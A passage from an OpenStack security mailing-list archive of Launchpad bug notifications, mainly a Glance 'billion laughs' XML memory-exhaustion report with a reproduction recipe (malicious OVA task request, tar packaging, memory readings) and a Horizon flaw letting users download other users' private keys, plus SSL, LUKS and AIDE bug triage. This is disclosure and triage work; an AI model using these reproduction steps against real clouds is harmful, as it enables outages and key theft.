Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From sean_mcginnis at dell.com Thu Sep 29 02:40:04 2016 From: sean_mcginnis at dell.com (Sean McGinnis) Date: Thu, 29 Sep 2016 02:40:04 -0000 Subject: [Openstack-security] [Bug 1381365] Re: SSL Version and cipher selection not possible References: <20141015072233.17942.25827.malonedeb@chaenomeles.canonical.com> Message-ID: <20160929024009.23919.53317.launchpad@gac.canonical.com> ** Changed in: cinder Status: New => Won't Fix -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1381365 Title: SSL Version and cipher selection not possible Status in Cinder: Won't Fix Status in Glance: New Status in OpenStack Identity (keystone): Won't Fix Status in OpenStack Compute (nova): Won't Fix Status in OpenStack Security Advisory: Won't Fix Bug description: We configure keystone to use SSL always. Due to the poodle issue, I was trying to configure keystone to disable SSLv3 completely. http://googleonlinesecurity.blogspot.fi/2014/10/this-poodle-bites-exploiting-ssl-30.html https://www.openssl.org/~bodo/ssl-poodle.pdf It seems that keystone has no support for configring SSL versions, nor ciphers. If I'm not mistaken the relevant code is in the start function in common/environment/eventlet_server.py It calls eventlet.wrap_ssl but with no SSL version nor cipher options. Since the interface is identical, I assume it uses ssl.wrap_socket. The default here seems to be PROTOCOL_SSLv23 (SSL2 disabled), which would make this vulnerable to the poodle issue. SSL conifgs should probably be possible to be set in the config file (with sane defaults), so that current and newly detected weak ciphers can be disabled without code changes. To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1381365/+subscriptions From sean_mcginnis at dell.com Thu Sep 29 02:36:10 2016 From: sean_mcginnis at dell.com (Sean McGinnis) Date: Thu, 29 Sep 2016 02:36:10 -0000 Subject: [Openstack-security] [Bug 1372375] Re: Attaching LVM encrypted volumes (with LUKS) could cause data loss if LUKS headers get corrupted References: <20140922095132.18315.85937.malonedeb@chaenomeles.canonical.com> Message-ID: <20160929023615.18035.28447.launchpad@wampee.canonical.com> ** Changed in: cinder Status: New => Won't Fix -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1372375 Title: Attaching LVM encrypted volumes (with LUKS) could cause data loss if LUKS headers get corrupted Status in Cinder: Won't Fix Status in OpenStack Compute (nova): Invalid Status in OpenStack Security Advisory: Won't Fix Bug description: I have doubts about the flow of the volume attaching operation, as defined in /usr/lib/python2.6/site- packages/nova/volume/encryptors/luks.py. If the device is not recognized to be a valid luks device, the script is luks formatting it! So if for some reason the luks header get corrupted, it erases the whole data. To manage corrupted headers there are the cryptsetup luksHeaderBackup and cryptsetup luksHeaderRestore commands that respectively do the backup and the restore of the headers. I think that the process has to be reviewed, and the luksFormat operation has to be performed during the volume creation. To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1372375/+subscriptions From sbauza at free.fr Thu Sep 29 09:30:56 2016 From: sbauza at free.fr (Sylvain Bauza) Date: Thu, 29 Sep 2016 09:30:56 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160929093056.23640.79647.malone@soybean.canonical.com> Given the above comments, it doesn't seem related to Nova at all. Putting it as Invalid unless I'm wrong and if so, feel free to put it back to New. ** Changed in: nova Status: New => Incomplete ** Changed in: nova Status: Incomplete => Invalid -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Compute (nova): Invalid Status in OpenStack Security Advisory: Won't Fix Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From ian.cordasco at rackspace.com Thu Sep 29 14:05:03 2016 From: ian.cordasco at rackspace.com (Ian Cordasco) Date: Thu, 29 Sep 2016 14:05:03 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160929140503.23833.42905.malone@gac.canonical.com> So I'm confused. If something requires configuration before it will work, is that on by default? work_dir defaults to none. That means it will not allow tasks to run by default. Is that default in a way that I'm not understanding? -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From 1619039 at bugs.launchpad.net Thu Sep 29 17:44:27 2016 From: 1619039 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 29 Sep 2016 17:44:27 -0000 Subject: [Openstack-security] [Bug 1619039] Fix included in openstack/openstack-ansible-security 13.3.4 References: <20160831203607.4213.54281.malonedeb@wampee.canonical.com> Message-ID: <20160929174427.27899.23190.malone@chaenomeles.canonical.com> This issue was fixed in the openstack/openstack-ansible-security 13.3.4 release. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1619039 Title: Logging of martian packets should be configurable Status in openstack-ansible: Fix Released Bug description: The martian logging should be tunable. When neutron uses Linux bridging for networking, lots of martian packets will be logged. This logging isn't useful and can fill up a syslog server quickly. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1619039/+subscriptions From 1617343 at bugs.launchpad.net Thu Sep 29 17:44:29 2016 From: 1617343 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 29 Sep 2016 17:44:29 -0000 Subject: [Openstack-security] [Bug 1617343] Fix included in openstack/openstack-ansible-security 13.3.4 References: <20160826141422.16089.54915.malonedeb@soybean.canonical.com> Message-ID: <20160929174429.23585.7639.malone@gac.canonical.com> This issue was fixed in the openstack/openstack-ansible-security 13.3.4 release. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1617343 Title: AIDE should not look at changes in /run Status in openstack-ansible: Fix Released Bug description: AIDE shouldn't be wandering into /run since things there only live temporarily. --------------------------------------------------- Changed entries: --------------------------------------------------- d =.... mc.. .. .: /etc/apparmor.d/libvirt d =.... mc.. .. .: /etc/libvirt/qemu d =.... mc.. .. .: /root f >b... mc..C.. .: /root/.bash_history f >.... mc..C.. .: /root/.ssh/known_hosts f >b... mci.C.. .: /root/.viminfo f =.... mci.C.. : /run/motd.dynamic d >.... mc.. .. : /run/shm f =.... ....C.. : /run/shm/spice.29052 d =.... mc.. .. : /run/systemd/sessions d =.... mc.. .. : /run/systemd/users f =.... mci.C.. : /run/systemd/users/0 d >.... . .. : /run/udev/data d =.... mc.. .. : /run/user To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1617343/+subscriptions From 1616281 at bugs.launchpad.net Thu Sep 29 17:44:31 2016 From: 1616281 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 29 Sep 2016 17:44:31 -0000 Subject: [Openstack-security] [Bug 1616281] Fix included in openstack/openstack-ansible-security 13.3.4 References: <20160824023003.4754.11744.malonedeb@gac.canonical.com> Message-ID: <20160929174431.24103.32246.malone@soybean.canonical.com> This issue was fixed in the openstack/openstack-ansible-security 13.3.4 release. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1616281 Title: Can't initialize AIDE during subsequent playbook runs Status in openstack-ansible: Fix Released Bug description: AIDE isn't initialized by default because it can cause a lot of system load when it does its first check of a new system. If a deployer applies the security hardening role with ``initialize_aide`` set to False (the default), it won't be initialized. However, if they set it to True and re-run the playbook, AIDE is already configured and the handler to initialize AIDE won't execute. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1616281/+subscriptions From 1619039 at bugs.launchpad.net Thu Sep 29 18:07:55 2016 From: 1619039 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 29 Sep 2016 18:07:55 -0000 Subject: [Openstack-security] [Bug 1619039] Fix included in openstack/openstack-ansible-security 12.2.4 References: <20160831203607.4213.54281.malonedeb@wampee.canonical.com> Message-ID: <20160929180755.17718.12000.malone@wampee.canonical.com> This issue was fixed in the openstack/openstack-ansible-security 12.2.4 release. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1619039 Title: Logging of martian packets should be configurable Status in openstack-ansible: Fix Released Bug description: The martian logging should be tunable. When neutron uses Linux bridging for networking, lots of martian packets will be logged. This logging isn't useful and can fill up a syslog server quickly. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1619039/+subscriptions From 1617343 at bugs.launchpad.net Thu Sep 29 18:07:56 2016 From: 1617343 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 29 Sep 2016 18:07:56 -0000 Subject: [Openstack-security] [Bug 1617343] Fix included in openstack/openstack-ansible-security 12.2.4 References: <20160826141422.16089.54915.malonedeb@soybean.canonical.com> Message-ID: <20160929180757.17359.72656.malone@wampee.canonical.com> This issue was fixed in the openstack/openstack-ansible-security 12.2.4 release. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1617343 Title: AIDE should not look at changes in /run Status in openstack-ansible: Fix Released Bug description: AIDE shouldn't be wandering into /run since things there only live temporarily. --------------------------------------------------- Changed entries: --------------------------------------------------- d =.... mc.. .. .: /etc/apparmor.d/libvirt d =.... mc.. .. .: /etc/libvirt/qemu d =.... mc.. .. .: /root f >b... mc..C.. .: /root/.bash_history f >.... mc..C.. .: /root/.ssh/known_hosts f >b... mci.C.. .: /root/.viminfo f =.... mci.C.. : /run/motd.dynamic d >.... mc.. .. : /run/shm f =.... ....C.. : /run/shm/spice.29052 d =.... mc.. .. : /run/systemd/sessions d =.... mc.. .. : /run/systemd/users f =.... mci.C.. : /run/systemd/users/0 d >.... . .. : /run/udev/data d =.... mc.. .. : /run/user To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1617343/+subscriptions From 1616281 at bugs.launchpad.net Thu Sep 29 18:07:58 2016 From: 1616281 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 29 Sep 2016 18:07:58 -0000 Subject: [Openstack-security] [Bug 1616281] Fix included in openstack/openstack-ansible-security 12.2.4 References: <20160824023003.4754.11744.malonedeb@gac.canonical.com> Message-ID: <20160929180758.23995.57067.malone@gac.canonical.com> This issue was fixed in the openstack/openstack-ansible-security 12.2.4 release. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1616281 Title: Can't initialize AIDE during subsequent playbook runs Status in openstack-ansible: Fix Released Bug description: AIDE isn't initialized by default because it can cause a lot of system load when it does its first check of a new system. If a deployer applies the security hardening role with ``initialize_aide`` set to False (the default), it won't be initialized. However, if they set it to True and re-run the playbook, AIDE is already configured and the handler to initialize AIDE won't execute. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1616281/+subscriptions From ian.cordasco at rackspace.com Thu Sep 29 18:53:30 2016 From: ian.cordasco at rackspace.com (Ian Cordasco) Date: Thu, 29 Sep 2016 18:53:30 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160929185330.27339.27508.malone@chaenomeles.canonical.com> > but this feature(import OVA file task) is on by default. How is this on by default if you need to set the option in the config for it to work? Do you mean the API is something that you can send requests to? What I keep hearing is "We can't exploit this without the default config but we consider this a higher priority because it's exploitable by default" and that's not making sense. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From charles.neill at rackspace.com Thu Sep 29 19:29:36 2016 From: charles.neill at rackspace.com (Charles Neill) Date: Thu, 29 Sep 2016 19:29:36 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160929192936.27974.48991.malone@chaenomeles.canonical.com> I guess what I was trying to get at was, you have to e.g. set usernames/passwords in your configuration files before services relying on Keystone become useful. But I don't think anyone would call defining such variables "non-default" behavior. My uncertainty is this: is "work_dir" usually set by reasonable operators to make Glance work as expected? I imagine that Glance avoids setting a default because 1) it can trigger significant disk usage for whatever folder is selected, and 2) Glance can't always predict what device will be the right one to choose to accommodate that disk usage, so rather than accidentally filling e.g. your /usr/ drive, it forces you to define it yourself. This is similar to services not necessarily specifying defaults for Keystone creds, since it would be unreasonable to assume that "admin/admin" would work by default anyway. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From ian.cordasco at rackspace.com Thu 